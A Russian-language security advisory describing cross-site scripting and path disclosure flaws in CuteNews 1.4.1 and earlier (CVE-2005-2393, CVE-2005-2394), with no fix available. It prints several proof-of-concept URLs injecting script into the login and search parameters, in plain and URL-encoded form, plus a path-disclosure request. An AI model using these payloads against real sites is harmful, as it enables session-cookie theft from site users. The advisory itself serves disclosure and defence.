Межсайтовый скриптинг в CuteNews

Дата публикации:
21.07.2005
Дата изменения:
26.01.2009
Всего просмотров:
1546
Опасность:
Низкая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2005-2393
CVE-2005-2394
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
CuteNews 1.x
Уязвимые версии: CuteNews 1.4.1 и более ранние версии

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.

Уязвимость обнаружена в сценариях 'login.php' и 'search.php' из-за недостаточной обработки входных данных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:

http://[target]/[path]/index.php?lastusername='>
<script>alert(document.cookie)</script><!--

http://[target]/[path]/index.php? lastusername=
%27%3E%3Cscript%3Ealert%28document.
cookie%29%3C%2Fscript%3E%3C%21--

http://[target]/[path]/search.php?selected_search_arch=>
< script>alert(document.cookie)</ script><!--

http://[target]/[path]/search.php?selected_search_arch=
%3E%3Cscript%3Ealert%28document.cookie%29%3C
%2Fscript%3E%3C%21—

Удаленный пользователь может с помощью специально сформированного URL получить данные об установочной директории. Пример:

http://[target]/[path]/show_news.php?archive=whathell

URL производителя: cutephp.com/cutenews/

Решение: Способов устранения уязвимости не существует в настоящее время.

Журнал изменений:

26.01.2009
Изменена секция «Программа».

Ссылки: CuteNews 1.3.6 path disclosure & cross site scripting

или введите имя

CAPTCHA